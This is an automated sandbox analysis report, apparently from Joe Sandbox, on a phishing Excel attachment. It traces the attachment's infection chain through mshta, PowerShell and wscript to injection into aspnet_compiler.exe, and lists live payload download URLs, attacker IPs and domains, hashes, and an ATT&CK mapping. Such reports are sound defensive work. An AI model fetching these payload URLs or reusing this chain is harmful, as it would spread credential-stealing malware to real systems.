              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
              Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 121 Scripting | Valid Accounts | 111 Command and Scripting Interpreter | 121 Scripting | 211 Process Injection | 1 Masquerading | OS Credential Dumping | 2 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 23 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Install Root Certificate | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 14 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Behavior Graph ID: 1566415 | Sample: PO#BBGR2411PO69.xls | Startdate: 02/12/2024 | Architecture: WINDOWS | Score: 100
              Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 13 other signatures

              Process tree (each indented process was started by its parent):

              EXCEL.EXE
                DNS/IP: 146.70.113.200, 49162, 49164, 49165 TENET-1ZA United Kingdom
                DNS/IP: linkjago.me 188.114.96.6, 443, 49161, 49166 CLOUDFLARENETUS European Union
                Dropped: C:\Users\user\...\PO#BBGR2411PO69.xls (copy), Composite
                Dropped: C:\...\seemebestthingsgivenmegood[1].hta, HTML
                Signature: Microsoft Office drops suspicious files
                mshta.exe
                  DNS/IP: 188.114.97.6, 443, 49163 CLOUDFLARENETUS European Union
                  DNS/IP: linkjago.me
                  Signature: Suspicious command line found
                  Signature: PowerShell case anomaly found
                  cmd.exe
                    Signature: Suspicious powershell command line found
                    Signature: Wscript starts Powershell (via cmd or directly)
                    Signature: PowerShell case anomaly found
                    powershell.exe
                      Dropped: C:\...\seethebestmagicalthignsgivegoodfo.vbS, Unicode
                      Dropped: C:\Users\user\AppData\...\r3q12jmu.cmdline, Unicode
                      Signature: Installs new ROOT certificates
                      wscript.exe
                        Signature: Suspicious powershell command line found
                        Signature: Wscript starts Powershell (via cmd or directly)
                        Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Signature: Suspicious execution chain found
                        powershell.exe
                          DNS/IP: ip.1016.filemail.com 142.215.209.77, 443, 49167, 49172 HUMBER-COLLEGECA Canada
                          DNS/IP: 1016.filemail.com
                          Signature: Writes to foreign memory regions
                          Signature: Injects a PE file into a foreign processes
                          aspnet_compiler.exe
                      csc.exe
                        Dropped: C:\Users\user\AppData\Local\...\r3q12jmu.dll, PE32
                        cvtres.exe
                mshta.exe
                  DNS/IP: linkjago.me
                  cmd.exe
                    powershell.exe
                      wscript.exe
                        powershell.exe
                          DNS/IP: 1016.filemail.com
                          aspnet_compiler.exe
                      csc.exe
                        Dropped: C:\Users\user\AppData\Local\...\xmqw35tj.dll, PE32
                        cvtres.exe

              Source | Detection | Scanner | Label | Link
              PO#BBGR2411PO69.xls | 11% | ReversingLabs | |
              PO#BBGR2411PO69.xls | 8% | Virustotal | | Browse
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              linkjago.me | 0% | Virustotal | | Browse
              ip.1016.filemail.com | 0% | Virustotal | | Browse
              1016.filemail.com | 0% | Virustotal | | Browse
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              linkjago.me | 188.114.96.6 | true | false | | unknown
              ip.1016.filemail.com | 142.215.209.77 | true | true | | unknown
              1016.filemail.com | unknown | unknown | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta | true | Avira URL Cloud: safe | unknown
              http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF | true | Avira URL Cloud: safe | unknown
              http://146.70.113.200/231/ZAHHRZA.txt | true | Avira URL Cloud: safe | unknown
              https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c | true | Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
                                    http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaCmshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.448366945.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.507185245.00000000020C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002191000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl0mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://go.crpowershell.exe, 00000013.00000002.490602752.000000001C251000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://linkjago.me/Lmshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.215.209.77 | ip.1016.filemail.com | Canada | 32156 | HUMBER-COLLEGECA | true
188.114.96.6 | linkjago.me | European Union | 13335 | CLOUDFLARENETUS | false
188.114.97.6 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
146.70.113.200 | unknown | United Kingdom | 2018 | TENET-1ZA | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1566415
Start date and time: 2024-12-02 07:23:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Sample name: PO#BBGR2411PO69.xls
Detection: MAL
Classification: mal100.phis.troj.expl.evad.winXLS@31/36@11/4
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HCA Information:
                                              • Successful, ratio: 93%
                                              • Number of executed functions: 24
                                              • Number of non-executed functions: 52
                                              Cookbook Comments:
                                              • Found application associated with file extension: .xls
                                              • Changed system and user locale, location and keyboard layout to French - France
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Active ActiveX Object
                                              • Active ActiveX Object
                                              • Scroll down
                                              • Close Viewer
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                              • Execution Graph export aborted for target mshta.exe, PID 1520 because there are no executed function
                                              • Execution Graph export aborted for target mshta.exe, PID 3684 because there are no executed function
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:24:36 | API Interceptor | 136x Sleep call for process: mshta.exe modified
01:24:42 | API Interceptor | 218x Sleep call for process: powershell.exe modified
01:24:52 | API Interceptor | 22x Sleep call for process: wscript.exe modified
01:25:21 | API Interceptor | 6x Sleep call for process: aspnet_compiler.exe modified
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 15189
Entropy (8bit): 5.0343247648743
Encrypted: false
SSDEEP: 384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
MD5: 7BC3FB6565E144A52C5F44408D5D80DF
SHA1: C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
SHA-256: EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
SHA-512: D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines (65536), with no line terminators
Category: modified
Size (bytes): 159457
Entropy (8bit): 2.478404137107947
Encrypted: false
SSDEEP: 96:4owZw9d6yfag3at3EUW87FEtLbJte8I40Jduvpv3at3EUW87FEtLbYZte8I40Jd/:4Lw3OmHsaZYJPdQ
MD5: 51D8EF6EBCD710802189071E5AD9F154
SHA1: 3D0178A66A7ED8FB3B53C7B85EA447043ED51AC3
SHA-256: 66A1E9B4E372B5040F6CD336D1BC57381B4486E56C4B0E114819B49514B21A20
SHA-512: CF352AAC8D86126A3C50A1B304245D2C4B94DDA902818B250F2B089E1B38240F9E13DD7F84B22C657C133C4E91A5B3CF90C2AA9E63F4909BE629A4EF6788A7E6
Malicious: true
Yara Hits:
• Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta, Author: Joe Security
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (3453), with CRLF line terminators
Category: dropped
Size (bytes): 154384
Entropy (8bit): 3.8033508297517873
Encrypted: false
SSDEEP: 3072:ECFOB9LjxbTAKZGEDqmCFOB9LjxbTAKZGEDMCFOB9LjxbTAKZGEDP:EcoBWKZGEDqmcoBWKZGEDMcoBWKZGEDP
MD5: 297E6244E9EDCAEB8B1F6705E40CB51D
SHA1: 230882871D7FF55237292422E02EEF841CF5F21E
SHA-256: 9CCE8E2B2E0A7512420E3C93DEC3B33DB128D7FD694F6FC9AE1C8C9FF9817365
SHA-512: F722D14668F8B75AB7B2DB08FF3A2D2B85007C8902E213B094C24DB2694E785AFF8D41F0117E18414E4807AA30BA2A57C01C16186B046B23C64E7F4320D972AE
Malicious: false
                                                  Preview:...... . . . .....Q.k.i.x.m.W.O.c.e.K.O.z.a.U.i. .=. .".j.W.W.L.N.q.L.L.Z.S.T.j.J.n.h.".....h.N.L.W.d.i.k.L.k.j.U.p.e.P.K. .=. .".P.C.l.a.h.f.W.L.d.z.c.G.L.O.h.".....e.a.q.A.q.s.K.W.K.W.i.e.m.h.C. .=. .".o.L.s.O.k.N.A.t.k.L.N.p.g.u.I.".........q.P.d.P.P.Q.m.t.x.W.B.R.o.L.W. .=. .".W.f.B.z.R.l.Z.c.W.U.N.S.A.i.q.".....T.U.c.N.i.e.L.t.U.L.z.B.i.O.A. .=. .".p.h.L.N.m.i.b.O.N.t.o.e.U.Z.P.".....B.W.n.L.t.A.u.b.L.W.u.f.c.a.G. .=. .".L.c.U.n.h.L.o.k.n.L.L.Z.G.o.T.".....N.J.z.W.W.Z.f.x.L.N.W.a.Z.h.A. .=. .".p.G.N.p.G.C.f.t.H.L.e.h.L.K.p.".....c.e.h.l.P.Q.P.t.k.z.S.Z.k.A.e. .=. .".B.K.N.i.i.K.U.q.c.W.m.B.i.e.c.".....b.k.o.v.K.L.h.K.A.P.W.K.L.K.U. .=. .".l.i.G.l.d.C.f.W.B.c.e.c.c.h.z.".....U.A.u.u.B.g.s.R.L.S.Q.G.Q.L.H. .=. .".P.W.L.k.f.K.h.h.W.A.W.g.L.L.Z.".....u.W.k.e.i.W.i.U.K.L.h.l.W.k.q. .=. .".L.W.o.T.K.B.L.Q.L.o.b.c.x.a.G.".....K.p.m.p.K.L.L.m.i.e.c.i.v.L.L. .=. .".Z.L.K.O.q.k.f.h.u.e.L.B.Z.Q.L.".....O.N.k.C.f.h.N.W.G.u.W.e.L.W.T. .=. .".k.W.N.f.p.z.L.t.O.K.v.l.L.e.C.".....d.K.k.t.U.U.G.U.
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1293620
                                                  Entropy (8bit):4.563127917199792
                                                  Encrypted:false
                                                  SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                  MD5:F71C973B5E362DFD6408D6C009E5643E
                                                  SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                  SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                  SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):109544
                                                  Entropy (8bit):4.282675970330063
                                                  Encrypted:false
                                                  SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                                                  MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                                                  SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                                                  SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                                                  SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):44256
                                                  Entropy (8bit):3.147465798679962
                                                  Encrypted:false
                                                  SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                                                  MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                                                  SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                                                  SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                                                  SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):44256
                                                  Entropy (8bit):3.15066292565687
                                                  Encrypted:false
                                                  SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                                                  MD5:F1EC2E98B0F577B675156B13DCF94105
                                                  SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                                                  SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                                                  SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                                                  Malicious:false
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 06:25:06 2024, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1328
                                                  Entropy (8bit):4.001579466132155
                                                  Encrypted:false
                                                  SSDEEP:24:H3se9E2U5XatdH3wKdNWI+ycuZhNAUakSh5PNnqSqd:MlQgKd41ulAUa3h7qSK
                                                  MD5:754B4C47A9BA7BC7F4393E1F2BFD5855
                                                  SHA1:D70C8D56B63B382E9C8B18FA5EB3CB079C895168
                                                  SHA-256:198AAF02DE3255F7BB7C49B6B62ED27163CE3F566EF56B97307CEC25AF14EF43
                                                  SHA-512:2E8652663C39AFC26B28E03DCC0DEBC62C857E02392E4885EF4A737FF4D2D5E22E33BAE5641ECFB374BDCD0C2D2EF0587AD777BD2CF1E6D10F6C086586899193
                                                  Malicious:false
                                                  Preview:L....RMg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP..................M..D*.E ..gM6..........4.......C:\Users\user\AppData\Local\Temp\RES1610.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.m.q.w.3.5.t.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 06:24:46 2024, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1328
                                                  Entropy (8bit):3.9950141320650583
                                                  Encrypted:false
                                                  SSDEEP:24:HYe9E2UPkwDOLdHhfwKdNWI+ycuZhNzakSlPNnqSqd:AEWKd41ulza3/qSK
                                                  MD5:CE802207FA53152661802E440FC0615E
                                                  SHA1:65C197F3290D1C1A78C292EAB183E4D96C813A73
                                                  SHA-256:914283CECCE296E850142517C1B005827BC16F8F14E99F111DCFC08A10A3E9BE
                                                  SHA-512:E55BE4BB9905045EC6351D736B5A90BFC5B8E5F93341638862891824B287E8BE275796E2BF5D068273687E5E290D3BD7701A402D18436EE7590657459D9379C3
                                                  Malicious:false
                                                  Preview:L....RMg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP.................<.tj.o...bn...........4.......C:\Users\user\AppData\Local\Temp\RESC5BF.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.3.q.1.2.j.m.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):652
                                                  Entropy (8bit):3.127317571933919
                                                  Encrypted:false
                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzlfak7YnqqwlYPN5Dlq5J:+RI+ycuZhNzakSlPNnqX
                                                  MD5:D199953CE797746A1D6F89C4E4626E96
                                                  SHA1:D4422A2134F5165E01069E359F3878045FC8A845
                                                  SHA-256:E0A687E0EB36EE82EFCEFE35FDC6EE1FDC9E37394451D543DAC8E27E393FA0CB
                                                  SHA-512:BFCB5B9B4199BA779A68873B11C6F3A8379C7A8C58E82F03F8113420524344DCD8351981AE8E20F4089ED48028347507E5BA1A775BA8D4116C0CC46A54BE5B71
                                                  Malicious:false
